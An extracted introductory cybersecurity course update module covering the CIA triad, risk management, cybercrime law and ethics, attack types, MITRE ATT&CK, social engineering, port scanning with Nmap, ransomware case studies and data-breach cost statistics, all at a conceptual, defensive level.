इस पृष्ठ में मौजूद कु छ पाठ आपके द्वारा चुनी गई भाषा में नहीं है। इसका मशीन द्वारा अनुवाद

कराना संभव है।

साइब&
#x930;
सुरक&
#x94D;षा
की
बुनि&
#x92F;ादी
बाते&
#x902;
What's New in Cybersecurity Fundamentals

What's new - introduction

5 मिनट

Introduction

What's new?

• Important updates to content in previous course modules

Cookie Preferences
Cybersecurity evolves alongside developments in politics and technology, such as artificial intelligence (AI). This
course must also evolve to keep up with the field!

This module covers important updates to content in previous course modules. The lessons present these updates
in a consistent format. For example, consider the next lesson, What’s New for “Overview of Cybersecurity”.

• The lesson includes new content relevant to various lessons in the Overview of Cybersecurity module.

• For each updated lesson from the Overview of Cybersecurity module, you’ll find two components:
• A list summarizing what’s new

• The new content

At the end of each What’s New module, you’ll be presented with a short quiz to test your learning of the new
concepts. You must pass this quiz to mark the lesson complete. But don’t worry! If you aren’t successful at first,
you can retake the quiz as many times as needed to pass.

What's new - overview of cybersecurity

15 मिनट

What is cybersecurity?

What's new?

• Added more explanation for the CIA triad

• Added discussion of security controls used to meet each of the CIA triad’s objectives

CIA triad
Now you know what cybersecurity is. But what is it trying to accomplish? Effective cybersecurity delivers on three
objectives:

• Confidentiality

• Integrity

• Cookie Preferences
 Availability

These objectives make up the CIA triad (Confidentiality, Integrity, and Availability), a well-known model and a
cornerstone of cybersecurity.

Let’s explore each objective of the CIA triad.

Expand each section to learn more.

Confidentiality

Confidentiality means keeping data secret; that is, only authorized people can access or disclose the
data. For example, software companies typically keep their applications’ source code secret for
competitive advantage. To reduce the chances of a source code leak, they restrict access to only the
employees who need it. Confidentiality also covers people’s private data. One example is that your
healthcare provider must ensure that data collected while treating you, such as diagnoses or
prescriptions, stays private. With few exceptions, only you, your doctor, and authorized medical staff
should have access to that data.

In practice, confidentiality involves implementing safeguards that give the right level of access to the
right set of users at the right times, using the right methods.

Integrity

Integrity means ensuring that data is trustworthy and accurate by protecting it from unauthorized
modification and destruction. Say you spend $10 on a pizza. You might not care whether that
purchase is confidential. But what if something alters the transaction amount and you end up
spending $10,000 instead? Note that the integrity of this transaction might have been compromised
intentionally or unintentionally. Also, consider that although the cause of the error might be
technical, it might be human, too. Maybe someone entered the wrong payment amount.

To preserve integrity, you must also prevent unauthorized people from editing the data. In this
sense, integrity and confidentiality overlap.

Availability

Cookie Preferences
 Availability means ensuring timely and reliable access to and use of the data. For example, you
expect 24x7 online access to your bank account. To meet that expectation, your bank must
implement and maintain sufficient resources to keep online banking available and functioning
properly.

But timely access does not always mean immediate or even continuous access. For example, when
you request school transcripts, you might need to wait several days for school employees to locate,
process, and send out the documents. And if the school provides transcripts electronically, it might
limit the time frame in which recipients can access them. Regardless, the data is available within and
for a reasonable amount of time.

The CIA triad helps guide cybersecurity-related policies in an organization. Depending on their operations and the
scenarios that they encounter, different organizations might prioritize one objective over the others.

Controls
To meet each objective of the CIA triad, you need controls. In cybersecurity, controls are safeguards or
countermeasures to avoid, detect, counteract, or minimize security risks to physical, tangible, or digital property.

Let’s explore examples of controls for preserving confidentiality, integrity, and availability.

Expand each section to learn more.

Controls for confidentiality


Consider these standard controls for preserving confidentiality.

• Encryption converts your data into a form that only someone with the decryption key can
understand.

• Access controls are measures designed to ensure that only the correct people can view, modify, or
share data. If you use password protection, you’re using an access control. Access controls also
include biometrics, such as fingerprints or retinal scans, that ensure that only authorized people
can access the data.

• Cookie Preferences
 Patch management involves updating system software. Regularly updating system software fixes
potential security weak points that attackers can exploit.

Controls for integrity


Consider these standard controls for preserving integrity.

• Checksums are mathematical algorithms that generate a unique value for a data set. If the data
changes, the checksum will also change, alerting you to the alteration.

• Access controls and user permissions can limit who can change data and what changes they can
make.

• Data backups can help restore data to its correct state if changes occur.

• Audit trails can track and record all changes made to data. They give you a clear record of who
made a change and when they made it.

Controls for availability


Consider these standard controls for preserving availability.

• Redundant systems and data backup procedures help protect against data loss or system failure.
You might use multiple servers or store data in multiple locations.

• Antimalware software and firewalls protect systems from attacks that can disrupt services.

• Disaster recovery and business continuity plans lay out the steps needed to restore services
quickly and efficiently in case a disruption occurs, minimizing downtime.

Key Elements of Cybersecurity

What's new?

• Changed the first key element of cybersecurity from People to Education

• Cookie Preferences
 Added a section that describes the Education element of cybersecurity

Education
Education and awareness are among the most effective ways to improve an organization’s cybersecurity. You can
hold regular training sessions to teach employees the importance of cybersecurity and their role in maintaining it.
A culture of awareness around cybersecurity reduces the chances that employees engage in risky behavior and
increases the chances of them reporting suspicious activity. In short, education and awareness build a human
firewall that often catches threats that technology misses.

Risk Management

What's new?

• Revised the explanations of the four risk responses

• Expanded the explanation of risk appetite

Risk response
After an organization assesses all its risks, it starts risk management or response. Generally, organizations can
choose from the following four responses to a risk.

Expand each section to learn more.

Acceptance

The organization accepts the risk in its current form. It acknowledges the potential consequences of
the risk and is prepared to deal with them if they occur. A senior person within the organization,
referred to as a risk owner, makes the decision to accept a risk. Cookie Preferences
 Transference

The organization chooses to transfer the risk. It can have a third party accept part or all of the risk
instead of accepting the risk itself. Transfer typically occurs through insurance or outsourcing.
Though the risk remains, another entity manages its impact, reducing the direct threat to the
organization.

Reduction

The organization decides a risk is too large to accept and aims to reduce it in some fashion. To
reduce the risk, the organization can reduce either its likelihood or consequence. It does so by
implementing security controls or patching system vulnerabilities.

Rejection

The organization decides a risk is too high and rejects it, meaning that the organization withdraws
from being affected by it. Rejecting the risk can significantly change business operations. For
example, rejection might involve shutting down sites, avoiding markets, or avoiding activities that
lead to the risk.

Risk Appetite
A risk appetite is the level of risk that an organization is willing to accept.

• An organization has a high risk appetite if it is willing to accept a high level of risk.

• An organization has a low risk appetite if it does not like accepting risk.

In cybersecurity, risk appetite refers to an organization’s willingness to accept the potential consequences of
cyberattacks. Organizations with a high risk appetite might take bold initiatives, using the latest technologies and
potentially vulnerable systems, to pursue significant competitive advantages. They accept the risk of potential
cyberattacks, but also have robust contingencies for when breaches occur.

Conversely, organizations with a low risk appetite are more cautious in their approach to cybersecurity. They
might prioritize stability and reliability over competitive advantage, focusing more on protective measures such as
Cookie
firewalls, encryption, and regular system updates. These organizations aim to minimize the risk Preferences
of cyberattacks as
much as possible, even if doing so means missing out on certain opportunities.

Note that neither approach is better. An organization’s level of risk appetite should align with its overall strategic
goals and resources. It should also vary by the potential impact of cyberattacks on its operations and reputation.

Law and ethics

What's new?

• Expanded the discussion of computer misuse laws to cover some other notable cybercrime laws

• Expanded the discussion of cybersecurity ethics to cover some of the most important ethical
debates in cybersecurity today

Other notable cybercrime laws

Cybercrime laws aren’t limited to computer misuse. Let’s explore other notable laws common in numerous
countries.

Unauthorized data alteration

• Laws exist to prevent unauthorized alteration, deletion, or blocking of personal data.

• Unauthorized alteration includes altering data in a way that can harm a person or an organization.

Example

An example is an attacker hacking into a financial institution’s database and changing account balances. This
act leads to unauthorized data alteration and causes significant financial harm to the organization and its
clients.

Prohibited software

• Laws are in place against creating, using, or distributing software designed for committing cybercrimes.

• Such software includes malware, such as viruses, and hacking tools.

Example
Cookie Preferences
 An example is an attacker sending an email with a seemingly harmless file attached, such as a PDF file. But
when the recipient opens the file, a virus within it runs, infecting the recipient’s device. Laws prohibit
distributing malware through means such as email.

Cyberstalking and harassment

• Cyberstalking and harassment laws curb harmful or threatening behavior online.

• Common examples of this behavior include stalking, bullying, or intimidating others on the internet.

Example

A typical example of cyberstalking or harassment is someone continuously sending threatening messages to

another person through social media platforms, email, or other online communication tools. Cyberstalking
and harassment laws apply if the threats escalate to a point where the recipient feels unsafe or fearful. Such
actions can result in serious legal consequences, so people must exercise respect and discretion in online
interactions.

Discussion on Ethics
As the laws vary across the world, so do ethics. Lively debate continues about many aspects of ethics within
cybersecurity. For example, should organizations be permitted to leave booby-trapped files within their
infrastructure, awaiting an attacker to trigger one? Many argue that this practice is ethically sound. But under
most legal frameworks, such an action is illegal because the trapped files are considered malware.

Let’s examine some of the most important ethical debates in cybersecurity today.

Expand each section to learn more.

Retaliation

Ethical dilemmas exist around using techniques from the security industry to target criminals. Can an
act of retaliation be justifiable or defensible?

Rigorous debate surrounds hack back or active defense. This concept refers to the measures that a
cyberattack victim can take to find the perpetrators and potentially disrupt their operations. Though
some argue that such measures are needed to protect assets and deter future attacks, others raise
concerns about the potential for escalation.

Cookie Preferences
 Artificial intelligence

The ethical implications of artificial intelligence (AI) in cybersecurity have also come under the
spotlight. As AI becomes increasingly prevalent in cybersecurity tools and practices, so do questions
about accountability, transparency, and potential misuse. Should an AI system make a mistake, who
is responsible? How much trust should people put in these systems, and how can people ensure that
they are used responsibly?

Government use

Many nations have established cyberwarfare units to safeguard national security. These units protect
critical infrastructure, conduct surveillance, and launch cyberattacks. The laws and regulations
governing these units vary considerably and can be ambiguous. Whether laws of traditional warfare
should apply to the cyber realm is a contentious issue, and no worldwide consensus exists yet.

The same concerns apply to other government agencies and their operations. Though many
governments have implemented laws to safeguard their citizens’ data privacy, debate continues
about the extent to which government surveillance is ethical. Governments must balance national
security concerns and individual privacy rights.

You’ve reached the end of the lesson. Be sure to select the “I’ve checked it out” checkbox to take a mini quiz to
check your understanding of this lesson. Passing this quiz is required for lesson completion.

What's new - cybersecurity: on the offense

20 मिनट

Types of Cyberattacks

Cookie Preferences
 What's new?

• Updated the descriptions and examples for the following types of cyberattacks:

• Denial-of-service (DoS) attack

• Distributed denial-of-service (DDoS) attack

• Domain Name System (DNS) attack

• Added a new section on the use of AI in cyberattacks

Denial-of-service (DoS) attack

• A denial-of-service (DoS) attack is any attack that causes a complete or partial system outage.

• DoS can occur when a person or system floods a website or online service with too much network traffic, much
like a traffic jam on a road. This traffic overflow makes the website or service slow down or shut down
completely, denying access to legitimate users.

• DoS can also occur when traffic consumes enough system resources to slow down or crash the system.

Example

An attacker uses a billion laughs attack, also known as an XML bomb, where the attacker creates a small,
seemingly harmless piece of code in an Extensible Markup Language (XML) document. The attacker then
submits this document to the target organization’s system. When the system processes the code, the code
continually replicates. The replications consume more and more system resources, eventually slowing down
or even crashing the system.

Distributed denial-of-service (DDoS) attack

• A distributed denial-of-service (DDoS) attack is an attack that comes from multiple sources simultaneously to
cause a complete or partial system outage.

• To perform DDoS attacks, attackers use bots. A bot, or zombie, is an internet-connected device infected with
malware that enables the attacker to control the device remotely. For DDoS attacks, attackers manipulate
multiple bots under the same instance, forming a network of bots called a botnet. A botnet can include
hundreds or even thousands of bots, each sending data or requesting access from the target server
simultaneously. This sudden traffic surge overwhelms the server, causing a denial of service to its users.

• Attackers can use AI to analyze patterns and predict the optimal number of bots needed to effectively
overwhelm a target’s server without wasting resources. AI also helps attackers monitor each bot’s
performance in real time to maximize effectiveness.

Cookie Preferences
 Example

An attacker can send many page requests to a web server over a brief period, overloading the server.
Similarly, spikes in user demand on ticket sale websites can overload systems.

Domain Name System (DNS) attack

• The Domain Name System (DNS) is one of the core protocols used on the internet. With the DNS protocol, a
computer can resolve a domain to an IP address. For example, imagine a user types bmw.com into a browser’s
search bar and then presses Enter. The DNS protocol resolves this domain name to the IP address for the main
BMW website, taking the user to the site. This function is convenient because domain names are far easier to
remember than IP addresses!

• A DNS attack targets the DNS by manipulating or disrupting the resolution of domain names and possibly
redirecting users or hindering access to websites. It involves tactics such as domain hijacking and cache
poisoning.

Example

Attackers associated with the Roaming Mantis criminal gang have compromised wireless routers so that
entering the URL for a valid website redirects the user to a malicious website. This site delivers malware
called Wroba to the user’s device. When the device is infected, the attackers can use it as a bot, and then use
it to compromise other wireless routers. (1)

Source: (1) Lakshmanan, Ravie. Roaming Mantis Spreading Mobile Malware That Hijacks Wi-Fi Routers’ DNS
Settings (https://thehackernews.com/2023/01/roaming-mantis-spreading-mobile-malware.html). The
Hacker News, January 20, 2023.

AI in cyberattacks

Attackers are increasingly turning to AI. With AI, attackers can enhance the structure and sophistication of their
attacks in several ways.

Expand each section to learn more.

Task automation

AI can automate repetitive tasks, enabling attackers to launch attacks at a speed and scale
otherwise impossible. For example, AI can automate the creation and dissemination of phishing
emails, increasing the likelihood of success.
Cookie Preferences
 Detection evasion

AI can help attackers create malware that changes and adapts to evade detection by traditional
antivirus solutions. To do so, attackers often use machine learning (ML) algorithms that can learn
from each detection attempt and alter the malware’s code to avoid future detections.

Target identification

AI can help attackers identify optimal targets for attacks. Sophisticated algorithms can analyze vast
amounts of data to identify vulnerable systems or high-value targets, thus increasing the
effectiveness of attacks.

Social engineering

Attackers can use AI technologies, such as deep learning, to enhance the effectiveness of social
engineering attacks with convincing fake audio and video content. One notable example is
deepfakes, which are fake images, videos, or audio created through deep learning. For example, an
attacker might call a victim and use an audio deepfake to impersonate someone that the victim
knows and trusts.

AI has introduced a new challenge for cyberdefense systems. The cybersecurity landscape must continually
evolve, incorporating AI in its strategies to effectively counter these advanced threats.

Structure of a cyberattack

What's new?

Cookie Preferences
 Added a scenario to the “Importance of understanding cyberattacks” section to illustrate how
cyberattack frameworks help cybersecurity professionals

Importance of understanding cyberattacks

Attackers can be persistent. Rarely do they give up after a single interruption to their attack. Think of a
cyberattack as part of a longer campaign. Many attacks last months, with attackers spreading their influence and
defenders trying to identify and stop them. Good defenders try to anticipate an attacker’s next move. Frameworks
such as the MITRE ATT&CK matrix help them to do so.

To help you explore the significance of these frameworks, consider this scenario. Janina, a cybersecurity
professional, works for a major tech company. A data breach occurs. The intruder has gained access but hasn’t
fully achieved their objectives yet. Janina must determine the attacker’s strategy and prevent further damage to
the system.

Initial access

The first two tactics in the MITRE ATT&CK matrix are reconnaissance and resource development. Because
the breach has already occurred, Janina starts her investigation with the next tactic: initial access
(https://attack.mitre.org/tactics/TA0001/). She identifies the initial breach point.

Phishing

Janina investigates the initial access further to discover the technique used. She determines that the attacker
used the phishing (https://attack.mitre.org/techniques/T1566/) technique, which is listed as one of the
techniques under initial access. Specifically, the attacker used spear phishing. They tailored their phishing
email to a company executive, tricking this person into providing their login credentials.

Execution

Next, Janina turns to the MITRE ATT&CK matrix to predict the likely next steps of the attacker. She examines
the tactic that follows initial access in the matrix: execution (https://attack.mitre.org/tactics/TA0002/). She
reads that at this stage, attackers use various types of commands and scripts to run malicious code on
systems. As a cybersecurity professional, she knows that scripting is a common technique after spear
phishing. Putting all this information together, Janina predicts that the attacker used scripts to automate their
malicious operations and move further into the system.

Scripting

Janina immediately checks for signs of scripting in the system logs. She finds evidence that the attacker used
a PowerShell script to perform malicious commands. This finding confirms her hypothesis that the attacker
used scripts to move further into the system.

Persistence and privilege escalation

Cookie Preferences
 Having identified the attacker’s current tactics and techniques, Janina uses the MITRE ATT&CK matrix to
prepare for the next likely steps. She focuses on the persistence (https://attack.mitre.org/tactics/TA0003/)
and privilege escalation (https://attack.mitre.org/tactics/TA0004/) tactics; these tactics typically follow
execution. She counters the cyberattack with the mitigation strategies listed for both techniques.

By anticipating the attacker’s moves and using the matrix as a guide, Janina effectively countered the breach,
limited damage, and protected the company’s systems.

Funding and profitability of cybercrime

What's new?

• Revised and expanded the explanation of the underground ecosystem

• Expanded the description of cryptocurrency

Underground ecosystem
A vital element of the cybercrime economy is a robust and growing underground ecosystem with a vast,
interconnected network of illegal platforms and forums. In this digital black market, cybercriminals buy, sell, and
trade tools and stolen data. They also use this space to collaborate and train themselves and others. They can
seek advice, learn new attack methods, and even hire skilled people to perform specific tasks. Like a traditional
economy, specialism drives efficiency and allows criminals to focus on what they each do best.

The underground ecosystem continually evolves, with new forums and platforms appearing as authorities shut
down others. Its dynamic nature and global reach make it a challenging threat to cybersecurity efforts.

Cryptocurrency
You learned that in ransomware attacks, cybercriminals require victims to pay a ransom. Typically, victims must
pay in the cybercriminal’s preferred currency: cryptocurrency. But what exactly is cryptocurrency, and why do
cybercriminals prefer it?

Cryptocurrency is a digital or virtual currency that uses cryptography to secure financial transactions, control the
creation of new currency units or coins, and verify asset transfers. Each cryptocurrency has its own rules and
protocols, but they all operate on an emerging technology called blockchain. Blockchain is a distributed ledger

Cookie Preferences
that records all transactions across a computer network. The system encrypts each transaction, adds it to a
block, and then adds that block to a chain of previous blocks. This process creates a permanent and transparent
record of all transactions, making altering or manipulating the data difficult.

One of the most well-known cryptocurrencies is Bitcoin. Introduced in 2009, Bitcoin paved the way for
developing numerous other cryptocurrencies, often called altcoins.

Cryptocurrency in cybercrime

Cryptocurrencies offer several advantages over traditional currencies, such as faster and cheaper transactions,
increased privacy and security, and potential service for unbanked or underbanked individuals. But
cryptocurrencies also pose risks, such as volatility in their value and challenges from regulations. The most
relevant risk for cybersecurity is their potential use in illicit activities.

Cybercriminals often use cryptocurrencies because the currency is anonymous and typically decentralized,
meaning that it operates independently of a central authority, such as a government or bank. These features
make tracing transactions difficult for law enforcement agencies. Cryptocurrencies, especially Bitcoin, have
become the primary currency of the dark web, where criminals trade illicit goods and services. Consider the
following examples:

• In ransomware attacks, cybercriminals demand payment in Bitcoin because its anonymous nature masks the
receiver’s identity.

• In many money laundering schemes, cybercriminals use Bitcoin to erase the funds’ illicit origins by moving
money through virtually untraceable networks.

Social engineering

What's new?

• Revised and expanded the “Why does social engineering work?” section

• Expanded the “How can you defend against social engineering?” section to include a discussion of
how organizations defend against social engineering

Why does social engineering work?

Social engineering works because humans are imperfect. In short, attackers exploit people’s propensity to take
shortcuts and make quick decisions based on false promises.

Cookie Preferences
Let’s explore the specific reasons why social engineering works so well.

Expand each section to learn more

Human nature and social norms


Social engineering takes advantage of human psychology and our natural inclination to trust and
help others. Attackers exploit social norms and expectations to manipulate people into divulging
information or performing actions that they wouldn’t perform otherwise.

For example, an attacker might pose as a coworker in distress, urgently needing access to a
particular system to meet a deadline. The target, driven by the desire to be helpful, provides the
requested information without second-guessing the authenticity of the request.

Trust and authority


Attackers often exploit people’s trust in authority figures or institutions. They can gain credibility and
deceive targets by impersonating someone in a position of power or using official-sounding
language.

For example, an employee might receive an email from someone claiming to be the company’s chief
executive officer (CEO). The supposed CEO demands immediate action on a sensitive issue, such as
providing access to a client’s records. Because the email seemingly comes from the top executive,
the employee hastily complies without verifying the authenticity of the request. As a result, the
employee provides confidential client data to the attacker.

Emotional manipulation

Social engineering often uses emotions such as fear, curiosity, or excitement to influence decision-
making. Attackers create a sense of urgency or exploit personal vulnerabilities to manipulate targets.

For example, someone might receive a phone call from an attacker posing as a representative for the
lottery. The attacker congratulates the person for winning the grand prize. The excitement and lure
of a large monetary reward cloud the victim’s judgment. In turn, they share their bank account
information to ensure the lottery company can transfer the supposed prize into their account.

Cookie Preferences
 Lack of awareness

Social engineering works well on people less informed about common security and potential risks.
And people unfamiliar with social engineering tactics are especially susceptible to manipulation.

For example, a person might receive an email that seems to be from a trusted banking institution
instructing them to update their password because of a security breach. Unaware of standard social
engineering tactics such as this one, the person promptly follows the instructions and unknowingly
gives their login details to the attacker.

All these factors impact a target’s ability to make a good decision or even notice that they are being manipulated
in the first place.

How can you defend against social engineering?

But how do organizations defend against social engineering? They should focus on the three key elements of
cybersecurity: process, education, and technology.

• Process: They should implement policies that outline the acceptable use of corporate resources and
procedures for handling sensitive information.

• Education: They should hold regular cybersecurity training sessions to ensure that every employee
understands the policies and the risks associated with violating them.

• Technology: They should invest in security software, such as spam filters and antimalware software, that can
detect and thwart social engineering attacks.

When implemented together, these measures can significantly boost an organization’s defenses against social
engineering.

Open-source intelligence

What's new?

•
Cookie Preferences
 Added three more sources of open information to the “Sources of open information” section

Sources of open information

Imagine that an attacker wants to collect basic information about an organization or person. Where might they
start? Below are a few examples of common sources of open information. Remember that many more possible
sources exist, and new ones emerge all the time.

Expand each section to learn more.

Forums and discussion boards


Online platforms like Reddit, Quora, and technology-specific message boards might contain a
plethora of helpful information. People often share expertise, experiences, and insights on these
platforms, inadvertently disclosing valuable information about an organization’s people,
technologies, or security.

Job posts

Job posts can contain various details helpful in planning an attack. For example, a post might list
software that applicants must be proficient with, indicating that employees use this software. An
attacker can research it for known vulnerabilities to help plan an effective attack.

Other helpful information about the company can include proprietary technologies, upcoming
projects, and organizational structure.

DNS records

An attacker can use various online tools to examine an organization’s DNS records. For example,
WHOIS is a protocol that you can use to query databases that store registered users or assignees of
an internet resource, such as a domain name. It provides information about the organization or
Cookie Preferences
 person who registered a domain, including their contact details. Attackers might also discover
subdomains that can reveal the organization’s network infrastructure.

Technical Scanning

What's new?

• Revised and expanded the “Port scanning” section

• Added descriptions of version and operating system (OS) scanning to the “Network vulnerability
scanning” section

• Added two new sections:

• Network scanning

• AI in technical scanning

Port scanning

How does it work?

In networking, applications are accessible externally through services on digital ports. A port is a connection
point that sends or receives data for a specific network service, such as email. Each port is assigned a number in
the Transmission Control Protocol (TCP), a collection of internet protocols that make it possible to create and
maintain communication between internet-connected devices. Each port is also associated with an IP address.
The relationship between IP addresses and ports is like that between a building and its floors: an IP address is
like a building, and port numbers are like different floors in that building.

The usual goal of port scanning is to identify a host’s open ports.

• A host is a device, such as a server, workstation, laptop, or other smart device, that can communicate with
other devices on a network and grant access to devices outside the network.

• An open port is one that accepts a connection. Given that a port number is like a floor in a building, an open
port is like a floor that you can access through an open door.
Cookie Preferences
Attackers want to find and exploit open ports on hosts. Conversely, network administrators want to close or block
these ports while ensuring that legitimate users still have access.

This diagram depicts a port scanner

scanning a server. The scanner tests one port
at a time to determine if a specific service is
available on the port. However, each port
rejects the connection, meaning it’s a closed
port.

The scanner reports that a port is closed if the port rejects the connection or filtered if the host gives no response
to the scan. No response can mean that a package filter, a type of firewall, is blocking access to the port.What
does it provide?

By working through the list of a host’s well-known ports, a scanner can often determine what the host’s owner
uses the device for. The TCP contains 65,536 ports. TCP ports 0 through 1,023 are called well-known ports: each
has a specific service associated with it, and this association is internationally recognized. Some ports from 1,024
through 49,151 might also have officially registered uses of interest.

Example

HTTP web activity always occurs on TCP port 80. If a scan reveals that port 80 is open, the investigator knows
that some web-based application might be using it. For another example, Windows file sharing occurs on TCP
port 445. If attackers know this port is open, they might try to exploit it with malware. Famous ransomware
attacks, such as the WannaCry attacks, have targeted this port.

A notable port outside the list of well-known ports is TCP port 3389, the default port for the Microsoft Remote
Desktop Protocol (RDP). If attackers know this port is open and available, they can try to hack the remote
desktop software.
Cookie Preferences
Network vulnerability scanning
In addition to dynamic scanning, other standard vulnerability scanning techniques include version and OS
detection:

• Version detection reveals the version numbers of software, such as Apache web server, running on the host

• OS detection reveals the device’s OS, such as macOS.

Network scanning
Network scans collect information about a network by targeting a host. Network and systems administrators rely
on network scans to assess the status and security of their organization’s network. Unfortunately, cyberattackers
can use these same tools for malicious purposes.

Many network scanning applications exist, but the most well-known scanner is Nmap.

Nmap (https://nmap.org/), short for Network Mapper, is a free, open-source network scanner available for
Windows, macOS, Linux, and other OSs. Though port scanning is its core feature, Nmap provides other valuable
features for investigating networks.

• It can reveal the network path from the scanning device to the host, including all other hosts encountered
along the way.

• It can perform version and OS detection.

• It can even identify firewalls in use.

Nmap is a command-line program, but most versions also include Zenmap, the official graphical user interface
(GUI) of Nmap. Zenmap (https://nmap.org/zenmap/) makes learning Nmap easier for beginners. With Nmap, you
must determine the precise command needed to perform your scan, and the number of options and syntactic
requirements can make this challenging. But with Zenmap, you can simply select choices from a user-friendly
interface to customize your scan. And if you still want to learn Nmap’s command-line options, Zenmap displays
the actual Nmap command and options behind your scan.

AI in technical scanning
AI has become valuable for network scanning. With machine learning (ML) algorithms, network scanners can
perform deeper, more helpful analysis.

• Scanners can independently analyze and categorize network vulnerabilities.

• Scanners can prioritize vulnerabilities based on their severity.

• Scanners can learn from past scans and identify patterns and trends to anticipate future threats.

AI can also streamline the scanning process. It can reduce the time needed to scrutinize large networks and
reduce the possibility of human error.
Cookie Preferences
An example of an AI-driven network scanning tool is IBM’s QRadar® Advisor with Watson™ application. It
analyzes security incidents, identifies potential threats, and provides actionable insights. QRadar Advisor uses ML
and AI to sift through vast amounts of data, investigating offenses and eliminating false positives. As a result,
analysts are free to focus on confirmed threats, optimizing their time and resources.

Case Studies

What's new?

• Added two recent case studies:

• Los Angeles Unified School District

• CashApp

Los Angeles Unified School District

The Los Angeles Unified School District (LAUSD), the US’s second-biggest school district, experienced a
ransomware attack in 2022. This attack significantly impacted more than 1000 schools and 600,000 students.
The ransomware kept LAUSD officials from accessing their systems and a great deal of critical data. Some
examples of this data include Social Security numbers, login credentials, tax forms, legal documents, financial
reports, health information, background checks, and student psychological assessments. LAUSD decided not to
pay the ransom, following the guidance of cybersecurity experts and law enforcement for handling ransomware
attacks. In response, the attackers, a Russian criminal group called Vice Society, released the data on the dark
web.

This breach is one of the largest that

the education sector has
experienced.1 It demonstrates how
attackers can exploit system
vulnerabilities and disrupt the
functions of critical public services.
Image source: Photo by
And LAUSD’s decision not to pay the
zephyr_p
ransom highlights the difficult choice
(https://stock.adobe.com/contributor/205091778/zephyr-p? that institutions face when dealing
load_type=author&prev_url=detail) on Adobe Stock with ransomware. Overall, the breach
(https://stock.adobe.com/search/free?
exposed the need for robust
k=ransomware&search_type=usertyped) cybersecurity measures in educational
institutions.
Cookie Preferences
Cash App
In April 2022, a former disgruntled employee at
Cash App used Cash App Investing to download
data from over 8 million users. Examples of data
stolen include customer names, brokerage
account numbers, stock trading portfolios, and
stock trading activity. Alarmingly, the breach
went undetected and unaddressed for four
months. (1)

Note: This case study involves Cash App

Investing, not the Cash App payment service
Image source: Photo by Mariia Shalabaieva
that you’re more likely familiar with.
(https://unsplash.com/@maria_shalabaieva) on Unsplash
(https://unsplash.com/photos/graphical-user-interface-
0KMCxhGFKvc)

Source: (1) Chin, Kyle. Biggest Data Breaches in US History [Updated 2023]
(https://www.upguard.com/blog/biggest-data-breaches-us). Upguard, November 10, 2023.

You’ve reached the end of the lesson. Be sure to select the “I’ve checked it out” checkbox to take a mini quiz to
check your understanding of this lesson. Passing this quiz is required for lesson completion.

What's new - cybersecurity: on the defense

20 मिनट

Financial Impacts

What's new

• Updated the key facts and takeaways from the Cost of a Data Breach Report to reflect the 2023
report’s findings

• Updated the key facts and takeaways from the Hiscox Cyber Readiness Report to reflect the 2023
report’s findings

• Elaborated on the Hiscox Cyber Readiness Report’s findings in more detail

Cookie Preferences
Cost of data breaches
Let’s learn about how detrimental cyberattacks can be to organizations. The cost of cybercrime to organizations
can be hard to predict and very damaging.

The annual Cost of a Data Breach Report (https://www.ibm.com/security/data-breach), conducted by the

Ponemon Institute and sponsored by IBM Security, analyzes data breach costs reported by hundreds of
organizations around the world and across industries. According to the 2023 report, the average total cost of a
data breach is USD 4.45 million. The cost has increased by 15% since 2020.

Now, you’ll review more key facts about the costs of data breaches, all taken from the Cost of a Data Breach 2023
report. The amounts are in US dollars.

• $4.45M: The average total cost of a data breach was USD 4.45 million.

• $165: The average cost per record involved in a data breach was USD 165.

• 277 days: The mean time to identify and contain a data breach was 277 days or just over nine months.

• 57%: 57% of organizations have increased their prices because of a data breach.

• United States: The United States experienced the highest average total cost of a data breach at USD 9.48
million.

• Healthcare: Healthcare experienced the highest data breach costs of all industries at USD 10.93 million.

Data breaches can cause devastating financial losses.

• According to the report, the biggest contributor to these costs is detection and escalation. Detection and
escalation involve activities related to detecting breaches, such as security audits and forensic investigations.

• The second biggest contributor is lost business. This consequence can linger for years because of the
reputational harm that an organization experiences.

• Regulatory fines can also impact an organization. Organizations that host the data of European Union (EU)
residents or do business with EU countries face some of the stiffest penalties per the General Data Protection
Regulation (GDPR), an extensive data privacy law and regulation.

The rising cost of breaches is a key driver for the cybersecurity industry. And the number of high-profile cases will
probably increase as more countries adopt data standards such as those in the GDPR.

Facing the challenge of rising attacks

Hiscox is a global specialist insurer. The Hiscox Cyber Readiness Report 2023
(https://www.hiscoxgroup.com/sites/group/files/documents/2023-10/Hiscox-Cyber-Readiness-Report-
2023.pdf) gauges how prepared businesses are to combat cyberattacks. The annual report surveyed over 6,000
cybersecurity professionals worldwide. It found that the cost and number of attacks continue to rise.

Review the report’s key findings.

• 53% of reporting companies suffered a cyberattack, up 48% from the previous year. Cookie Preferences
• The median spent on cybersecurity was USD 155,000, a 39% increase over three years.

• The median cost for attacks decreased slightly from around USD 16,000 to 17,000. As businesses have spent
more money on their cybersecurity measures, the cost of attacks has decreased.

• One out of eight attacks cost more than USD 250,000.

• Small businesses, defined as those with under ten employees, spent four times more on cybersecurity than
they did two years prior. Still, the number of small businesses that experienced an attack increased from 23%
to 36% over three years.

• One out of three companies experienced consequences from payment diversion fraud, the leading cause of
financial loss for businesses. Payment diversion fraud is where an attacker tricks an organization into rerouting
payments intended for suppliers or other business expenses into a bank account that the attacker controls.

• One out of five companies received a ransom demand. The percentage of companies paying the ransom
dropped from 66% to 63%. The reason for this shift might be better awareness of how to deal with
ransomware attacks and that paying ransoms isn’t always the best decision.

Note: Regardless of the reasons for the decrease, organizations should continue seeking professional
guidance when they experience ransomware attacks. Experts can recommend strategies for recovering data,
negotiating with attackers, handling legal consequences, and preventing future attacks.

Security strategy

What's new?

• Added a section that describes the components of a comprehensive security strategy

• Revised and significantly expanded the “Security maturity” section, such as by adding a discussion
of the Cybersecurity Capability Maturity Model (C2M2) and how to apply it

Security strategy

A security strategy is an organization’s well-defined plan to protect its digital and physical assets. A
comprehensive security strategy consists of the following components.

• Risk assessment: Risk assessment helps to identify and understand potential threats and vulnerabilities that
can impact assets.
Cookie Preferences
•
 Security policies and procedures: Security policies and procedures establish rules for maintaining security.

